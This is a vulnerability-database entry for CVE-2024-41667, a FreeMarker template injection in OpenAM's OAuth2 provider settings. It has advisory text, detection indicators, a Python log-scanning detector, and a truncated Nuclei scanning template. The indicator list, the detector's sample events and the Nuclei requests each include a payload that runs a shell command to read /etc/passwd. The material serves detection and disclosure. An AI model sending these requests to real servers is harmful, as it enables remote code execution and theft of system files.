CVE-2024-41667
Published 2024-07-24
Priority: P2 · 66 · Severity: high · CVSS 3.1 base score: 8.8
CVSS 3.1 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public (Nuclei template below)
EPSS: 3.54% (87.8th percentile)
OpenAM is an open access management solution. In versions 15.0.3 and prior, the `getCustomLoginUrlTemplate` method in RealmOAuth2ProviderSettings.java is vulnerable to template injection due to its usage of user input. Although the developer intended to implement a custom URL for handling login to override the default OpenAM login, they did not restrict the `CustomLoginUrlTemplate`, allowing it to be set freely. Commit fcb8432aa77d5b2e147624fe954cb150c568e0b8 introduces `TemplateClassResolver.SAFER_RESOLVER` to disable the resolution of commonly exploited classes in FreeMarker template injection. As of time of publication, this fix is expected to be part of version 15.0.4.
Affected
1 range
| Vendor | Product | Affected versions | Fixed in |
|---|---|---|---|
| openidentityplatform | openam | < 15.0.4 | 15.0.4 |
Detection & IOCs (extracted from sources)
- url: POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create
- url: PUT /openam/json/realms/root/realm-config/services/oauth-oidc
- url: /openam/oauth2/realms/root/authorize
- payload (FreeMarker expression): ${value("head -n 1 /etc/passwd")}
- path: /openam/json/realms/root/realm-config/services/oauth-oidc
- Detect exploitation attempts by monitoring PUT requests to /openam/json/realms/root/realm-config/services/oauth-oidc (and the equivalent path under any other realm) whose JSON body sets `customLoginUrlTemplate` to a FreeMarker payload such as `${value(...)}`.
- Successful exploitation can be confirmed when the URL-decoded Location header of an OAuth2 /authorize response contains `root:x:0:0:`, i.e. the first line of /etc/passwd rendered into the redirect target.
- The `X-Requested-With: XMLHttpRequest` and `Content-Type: application/json` headers on requests to the OAuth2 provider configuration endpoints are part of the exploit chain, but they are also exactly what the OpenAM admin console sends; use them as correlation attributes, not as an indicator on their own.
- The vulnerability resides in the getCustomLoginUrlTemplate method in RealmOAuth2ProviderSettings.java. Alert on FreeMarker expressions set in the customLoginUrlTemplate field, but note that the field is a FreeMarker template by design: legitimate values contain plain variable interpolations such as `${goto}` and `<#if ...>` directives, so a bare `${...}` match is noisy. Expressions that contain method calls, string literals, assignments or the `?new` built-in are the ones that matter.
- The fix (commit fcb8432aa77d5b2e147624fe954cb150c568e0b8) introduces TemplateClassResolver.SAFER_RESOLVER, which restricts the classes that FreeMarker's `?new` built-in may instantiate. This does NOT fully sandbox the template: only commonly exploited classes are blocked, and payloads built on classes the resolver does not block may still succeed.
- Exploitation requires privileges sufficient to write the OAuth2 provider configuration (the CustomLoginUrlTemplate value). The field itself was never restricted, so any principal who can modify that service can set it to an arbitrary template.
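The checks listed above, run over log data, as an added example written for this page (it is not OpenAM, Nuclei or vendor code). It parses a handful of constructed proxy-log events shaped like the two-request chain in the Nuclei template plus a legitimate configuration write and a post-exploitation redirect; the event shape, the `/openam` context path and the sample events are assumptions of the example. It generalizes slightly beyond the listed paths by matching the configuration and authorize endpoints under nested realms, and it treats plain `${var}` interpolations and bare control directives as benign, flagging only expressions with calls, string literals, assignments or the `?new` built-in (the built-in whose class resolution SAFER_RESOLVER restricts).

```python
# Detection logic for CVE-2024-41667 over constructed proxy-log events. Added
# example for this page, not OpenAM, Nuclei or vendor code; the event shape, the
# /openam context path and the sample events are assumptions of the example.
import json
import re
from urllib.parse import unquote

# OAuth2 provider service config endpoint under any realm depth
# (nested realms appear as /realms/root/realms/child/...).
CONFIG_PATH_RE = re.compile(
    r"^/openam/json/realms/(?:[^/?#]+/)*realm-config/services/oauth-oidc(?:[/?#]|$)")
AUTHORIZE_PATH_RE = re.compile(
    r"^/openam/oauth2/(?:realms/[^/?#]+/)*authorize(?:[/?#]|$)")
# FreeMarker interpolations ${...} / #{...} and directives <#...> / [#...].
FM_EXPR_RE = re.compile(r"\$\{(.*?)\}|#\{(.*?)\}|<#(.*?)>|\[#(.*?)\]", re.S)
# A plain variable interpolation such as ${goto}: the documented, benign shape.
SIMPLE_VAR_RE = re.compile(r"^\s*[A-Za-z_][A-Za-z0-9_]*\s*$")
# A login URL template never needs calls, string literals, assignments or the
# ?new built-in (the built-in whose class resolution SAFER_RESOLVER restricts).
DANGEROUS_RE = re.compile(r"\(|\?new\b|\?api\b|[\"']|\bassign\b", re.I)
PASSWD_MARKER = "root:x:0:0:"


def suspicious_expressions(template: str) -> list[str]:
    """FreeMarker expressions in `template` beyond plain ${var} or bare directives."""
    found = []
    for m in FM_EXPR_RE.finditer(template):
        inner = next(g for g in m.groups() if g is not None)
        if not SIMPLE_VAR_RE.match(inner) and DANGEROUS_RE.search(inner):
            found.append(m.group(0))
    return found


def find_values(obj, key):
    """Yield every value stored under `key` anywhere in a parsed JSON document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            if k == key:
                yield v
            yield from find_values(v, key)
    elif isinstance(obj, list):
        for v in obj:
            yield from find_values(v, key)


def analyze_event(ev: dict) -> list[dict]:
    """Apply the checks from the IOC list above to one request/response event."""
    alerts = []
    method, path = ev["method"].upper(), ev["path"]
    if CONFIG_PATH_RE.match(path):
        if method == "POST" and "_action=create" in path:
            alerts.append({"severity": "low", "rule": "oauth2-provider-create-probe",
                           "detail": path})
        if method == "PUT":
            try:
                doc = json.loads(ev.get("body") or "")
            except ValueError:
                doc = {}
            for tmpl in find_values(doc, "customLoginUrlTemplate"):
                bad = suspicious_expressions(tmpl) if isinstance(tmpl, str) else []
                if bad:
                    alerts.append({"severity": "high", "detail": bad,
                                   "rule": "customLoginUrlTemplate-freemarker-injection"})
    if AUTHORIZE_PATH_RE.match(path):
        # The rendered template is the redirect target, so command output lands
        # (usually percent-encoded) in the Location header.
        headers = {k.lower(): v for k, v in ev.get("resp_headers", {}).items()}
        location = unquote(headers.get("location", ""))
        if PASSWD_MARKER in location:
            alerts.append({"severity": "critical", "rule": "etc-passwd-leak-in-redirect",
                           "detail": location})
    return alerts


def scan(events):
    """(event index, alert) pairs for every alert raised over `events`."""
    return [(i, a) for i, ev in enumerate(events) for a in analyze_event(ev)]


# Constructed sample events (not real traffic): the two-request chain from the
# Nuclei template, a legitimate template write in a sub-realm, and a redirect
# observed after successful exploitation.
SAMPLE_EVENTS = [
    {"method": "POST", "body": "{}",
     "path": "/openam/json/realms/root/realm-config/services/oauth-oidc?_action=create"},
    {"method": "PUT", "path": "/openam/json/realms/root/realm-config/services/oauth-oidc",
     "body": json.dumps({"advancedOAuth2Config": {
         "customLoginUrlTemplate": '${value("head -n 1 /etc/passwd")}'}})},
    {"method": "PUT",
     "path": "/openam/json/realms/root/realms/sub/realm-config/services/oauth-oidc",
     "body": json.dumps({"advancedOAuth2Config": {"customLoginUrlTemplate":
         "https://login.example.com/?goto=${goto}<#if realm??>&realm=${realm}</#if>"}})},
    {"method": "GET", "path": "/openam/oauth2/realms/root/authorize?response_type=code",
     "resp_headers": {"Location": "root%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash"}},
]

if __name__ == "__main__":
    for idx, alert in scan(SAMPLE_EVENTS):
        print(f"event {idx}: [{alert['severity']}] {alert['rule']} -> {alert['detail']}")
```

The console headers are deliberately not used as a signal: the admin UI sends them on every configuration write, so they would only add noise. The `_action=create` probe is reported at low severity because the Nuclei template issues it unauthenticated and matches on the error body; on its own it is reconnaissance, not exploitation.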
GHSA
GHSA-7726-43hg-m23v · 2024-07-25 · CVE-2024-41667 [HIGH] · CWE-94 · OpenAM FreeMarker template injection
The advisory text matches the description above except for one phrase: it says the custom URL was intended to override "the default PingOne Advanced Identity Cloud login page" rather than the default OpenAM login.
OSV
osv · 2024-07-25 · CVE-2024-41667 [HIGH] · OpenAM FreeMarker template injection
Same advisory text as the GHSA entry.
No detection rules found.
Nuclei
OpenAM<=15.0.3 FreeMarker - Template Injection · nuclei · CVE-2024-41667 [HIGH] · CVSS 8.8
Only part of the template survived extraction: of its metadata just the fragment "OpenAM … 'Profile was updated.'" remains, and the request list begins mid-document.
Request list as extracted (the second request's JSON body is cut off in the source):

```yaml
- raw:
    - |
      POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create HTTP/1.1
      Host: {{Hostname}}
      X-Requested-With: XMLHttpRequest
      Content-Type: application/json
      Connection: keep-alive

      {}
  matchers:
    - type: word
      part: body
      words:
        - 'message'
        - 'reason'
        - 'code'
      condition: and

- raw:
    - |
      PUT /openam/json/realms/root/realm-config/services/oauth-oidc HTTP/1.1
      Host: {{Hostname}}
      X-Requested-With: XMLHttpRequest
      Content-Type: application/json

      {"advancedOAuth2Config":{"customLoginUrlTemplate":"${value(\"head -n 1 /etc/passwd\")}"},"deviceCodeConfig":{"completionUrl":"","verificationUrl":"","devicePollInterval":5,"deviceCodeLifetime":300},"oidcSsoProviderEnabled":false,"_id":"","_type":{"_id":"oauth-oidc","name":"OAuth2 Provider","collection":fal
```
References
- https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-7726-43hg-m23v
- https://github.com/OpenIdentityPlatform/OpenAM/commit/fcb8432aa77d5b2e147624fe954cb150c568e0b8